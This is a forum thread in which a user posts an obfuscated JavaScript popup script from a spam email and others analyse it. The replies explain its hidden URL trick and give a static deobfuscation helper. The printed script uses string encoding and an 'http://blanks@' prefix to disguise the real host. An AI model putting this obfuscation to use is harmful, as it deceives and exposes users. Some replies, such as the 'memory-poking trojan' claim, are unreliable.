
What is someone trying to SPAM me with?
Got this in the email today:

=0;foSmb8UqOw--)
{fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0wlength-1;foSmb8UqOw>=0;foSmb8UqOw--){if
(fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 <
41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));
}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fO3Mb8Uq0w
= fO3Mb8uq0w;alM0od0G7aS = fI9mXy5Zd;fo3Mb8uq0w=
"";fO3Mb8uq0w= "";almoOdOGLaS = "";fo3Mb8uq0W= "";
for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);
}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if
(fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 <
41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+82);else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMb8Uq0w
= fO3Mb8uq0w;j6k0mXry9="0";alMoOd0G7aS=fI9mXy5zd;almoOdOGLaS =
""; fo3Mb8uq0W=
"";m5sXt0o1f=String.fromCharCode(104,0x74,0164,0160,0x3a,057,0+47,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,040,32,040,0x20,0+32,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,040,040,32,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0x20,040,040,32,32,040,0x20,0+32,0x20,040,040,32,040,0x20,0+32,0100);fO3Mb8uq0w=
"";fo3Mb8uq0w= "";
j6k0MXry9="0";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if
(fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%8-35 <
41)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+89);
else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35));
}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMbSUq0w
= fO3Mb8uq0w;almoOdOGLaS =
"";j6k0mxry9="1";fo3Mb8uq0w="";fo3Mb8uq0W= "";alMoOdOG7aS =
fI9mxy5zd;fO3Mb8uq0w=
"";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);
}le5bKk3d9=100;for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--){if
(fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35 <
12)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35)+90);else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-35))
;}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSMrSuq0w
= fO3Mb8uq0w;alMoOdOGLaS = fi9mXy5zd;almoOdOGLaS =
"";fo3Mb8uq0w=
"";dfDSdn4mDq="0";fo3Mb8uq0W="";fO3Mb8uq0w="";for(foSmb8UqOw=0;foSmb8UqOw=0;foSmb8UqOw--){fo3Mb8uq0w+=almoOdOGLaS.charAt(foSmb8UqOw);}loe5bKk3d9=600;for(foSmb8UqOw=fo3Mb8uq0w.length-1;foSmb8UqOw>=0;foSmb8UqOw--)
{if (fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16 <
33)fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16)+89);
else
fo3Mb8uq0W+=String.fromCharCode((fo3Mb8uq0w.charCodeAt(foSmb8UqOw)-foSmb8UqOw%9-16));}for(foSmb8UqOw=fo3Mb8uq0W.length-1;foSmb8UqOw>=0;foSmb8UqOw--){fO3Mb8uq0w+=fo3Mb8uq0W.charAt(foSmb8UqOw);}fOSmrSuq0w
=
fO3Mb8uq0w;loe5bkK3d9=800;dfD8dn4MDq=100;SKvbbR45h=j6k0mXry9+String.fromCharCode(0x2c,0164,0x69,0+116,0154,101,0+98,0x61,0162,075);fdlkhHg8h=loe5bKk3d9+String.fromCharCode(0x2c,0155,0x65,110,0x75,98,0141,0x72,0+61);
jrhtDERff=j6k0mxry9+String.fromCharCode(0x2c,0163,0x74,0+97,0+116,0165,115,0+61);hty87fdq2=j6k0MXry9+String.fromCharCode(0x2c,0154,0x65,0x66,116,0+61);dFGgh54FG=dfD8dn4mDq+String.fromCharCode(0x2c,0162,101,115,0151,0x7a,0x61,98,0x6c,0145,075);FGhnJ7uk5=dfDSdn4mDq+String.fromCharCode(0x2c,0163,0143,0+114,111,0154,0+108,0142,97,0162,0x73,0x3d);kfn4RF8d4=loe5bkK3d9+String.fromCharCode(0x2c,104,101,0151,0x67,0150,116,0x3d);fUT4nvRE8=String.fromCharCode(0x77,0151,100,0164,0x68,075);nG45GJdsr="0"+String.fromCharCode(0x2c,116,0157,0x6f,0154,0142,0x61,0x72,0x3d);
z23rmhj76u=le5bKk3d9+String.fromCharCode(0x2c,0164,111,0+112,075);dnwjOmb3n=""+dfD8dn4MDq;mOky5SLt3=kfn4RF8d4+fdlkhHg8h+fUT4nvRE8+dFGgh54FG+FGhnJ7uk5+nG45GJdsr+hty87fdq2+jrhtDERff+SKvbbR45h+z23rmhj76u+dnwjOmb3n;mOky5sLt3=fUT4nvRE8+kfn4RF8d4+fdlkhHg8h+dFGgh54FG+FGhnJ7uk5+jrhtDERff+SKvbbR45h+nG45GJdsr+hty87fdq2+z23rmhj76u+dnwjOmb3n;
moky5sLt3=fUT4nvRE8+hty87fdq2+kfn4RF8d4+fdlkhHg8h+FGhnJ7uk5+jrhtDERff+dFGgh54FG+SKvbbR45h+nG45GJdsr+z23rmhj76u+dnwjOmb3n;mOky5slt3=z23rmhj76u+fUT4nvRE8+fdlkhHg8h+dFGgh54FG+kfn4RF8d4+FGhnJ7uk5+jrhtDERff+SKvbbR45h+nG45GJdsr+hty87fdq2+dnwjOmb3n;if(almoOdOGLaS==fI9mXy5Zd)window.open(m5sXt0o1f+fOSMrSuq0w,"",mOky5SLt3+dS94gnXs3);else
if(fi9mXy5zd!=fI9mxy5zd)windowopen(m5sXt0o1f+fO3Mb8Uq0w,"",mOky5sLt3+dS94gnXs3);else
if(fI9mXy5zd!=fi9mXy5zd)window.open(m5sXt0o1f+fOSMbSUq0w,"",moky5sLt3+dS94gnXs3);dFGgHS4FG=dfD8dn4mDq+String.fromCharCode(0x2c,0162,101,115,0151,0x7a,0x61,98,0x6c,0145,075);
FGhnJLuK5=dfDSdn4mDq+String.fromCharCode(0x2c,0163,0143,0+114,111,0154,0+108,0142,97,0162,0x73,0x3d);}urlgrey()

I'm assuming it's trying to do some funky stuff with Outlook, but all I'm seeing on my yahoo mail account is what I pasted in above. Any ideas? Just curious.
We have to fight the terrorists as if there were no rules and preserve our open society as if there were no terrorists. -- [link|http://www.nytimes.com/2001/04/05/opinion/BIO-FRIEDMAN.html|Thomas Friedman]
Try running it through a deobfuscator...
Like the one [link|http://www.swishweb.com/decrypt/ord2char_samp.php|here] maybe.

It seems to be obfuscated HTML with lots of window.open things. I don't see any virus-like stuff (File stuff), but I'm not an expert.

I'd guess it just pops up a bunch of stupid ads, but you can never tell....

HTH.

Cheers,
Scott.
More info.
Note the last line of the script:

urlgrey()

The preceding "code" defines urlgrey (assuming the initial part of the message was lost somewhere along the way). The last line runs it.

[link|http://www.cereus7.com/UGHome.html|Urlgrey Tea] is a Basic-like language for applets. Probably not what this is...

[link|http://news.spamcop.net/pipermail/spamcop-list/2001-October/022988.html|This] post to SpamCop.net discusses a similar obfuscated script. Perhaps it's even from the same outfit.

HTH.

Cheers,
Scott.
Looks like it
The bottom half builds

windowopen("http://_135_blanks_@" + ???_1,"","width=800, height=600, menubar=???_2, resizable=0, scrollbars=1, status=0, titlebar=0, toolbar=0, left=100, top=100" + ???_3);

which matches the discussion on SpamCop.

The real URL is decoded by the top half, but the seed value is missing.

Wondering if deobfuscating this was a violation of the DMCA? ;-)
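As an added example (not from any poster in this thread), the following resolves the String.fromCharCode(...) literals in the bottom half without running the script, which is how the "width=800, height=600, ..." feature string and the "http://<blanks>@" prefix above can be read off; the function names are my own and the sample is a shortened excerpt of the posted script.

```javascript
// Added example, not from any poster in this thread: statically resolve the
// String.fromCharCode(...) calls the spam script uses to hide its literals,
// without executing a byte of it. The script mixes decimal (104), hex (0x74),
// legacy octal (0164) and "0+47" arguments so a naive grep for "http" or
// "titlebar" finds nothing. Function names here are my own.

// Evaluate one argument the way the script's interpreter would.
function jsNumber(tok) {
  tok = tok.trim();
  if (/^0x[0-9a-f]+$/i.test(tok)) return parseInt(tok.slice(2), 16); // 0x74
  if (/^0\+\d+$/.test(tok)) return parseInt(tok.slice(2), 10);       // 0+47
  if (/^0[0-7]+$/.test(tok)) return parseInt(tok, 8);                // 0164
  if (/^\d+$/.test(tok)) return parseInt(tok, 10);                   // 104
  throw new Error("unsupported numeric literal: " + tok);
}

// Rewrite every String.fromCharCode(<literal list>) as the string it builds.
// Calls whose arguments are expressions (the decoder loops) are left alone.
function resolveFromCharCode(src) {
  return src.replace(/String\.fromCharCode\(([^()]*)\)/g, (_, args) =>
    JSON.stringify(args.split(",").map(jsNumber)
      .map((n) => String.fromCharCode(n)).join("")));
}

// The resolved URL prefix is "http://<blanks>@": everything before the last
// '@' in the authority is userinfo, so the blanks only pad the display and
// the real target is whatever the decoded half appends after the '@'.
function effectiveHost(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^/?#]*)/i.exec(url);
  if (!m) return null;
  const authority = m[1];
  const hostport = authority.slice(authority.lastIndexOf("@") + 1);
  return hostport.split(":")[0];
}

// Constructed excerpt: three assignments copied from the posted script, with
// the long run of 040/32/0x20/0+32 (space) arguments in the prefix shortened.
const SAMPLE = [
  "m5sXt0o1f=String.fromCharCode(104,0x74,0164,0160,0x3a,057,0+47,040,040,32,0x20,0+32,0100);",
  "fUT4nvRE8=String.fromCharCode(0x77,0151,100,0164,0x68,075);",
  "SKvbbR45h=j6k0mXry9+String.fromCharCode(0x2c,0164,0x69,0+116,0154,101,0+98,0x61,0162,075);",
].join("\n");

console.log(resolveFromCharCode(SAMPLE));
console.log(effectiveHost("http://     @host.example/")); // placeholder host, not from the page
```

The decoder loops that build ???_1 cannot be resolved this way because their seed string is missing from the post.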

That's what I figured
But on this public terminal, even if I had some tools I could deobfuscate it with, I don't know enough about windows trojan programming to ensure I didn't trigger the damn thing just by trying to read it.

Thanks for clearing it up (somewhat). I was wondering if I should report them to their ISP for it, but hell, no harm no foul, right? (Translates as: I don't feel like spending the next three weeks trying to explain to level 1 support that this thing was a nastygram.)
I am not sure
but it could be embedded VBA scripting code for the latest VBA Virus/Trojan/Worm?
It's code of some kind
I spent a few minutes typing the character codes into a binary editor. It's doing some far calls; I know nothing whatever about the internals of Windows or Outlook, so can't tell you what they do, but the script is setting up variables containing arbitrary byte values as strings, then poking them into memory like an old-fashioned Apple Basic program.

IOW this is a trojan of some kind. Looks like the starting delimiter got lost somewhere.
Regards,
Ric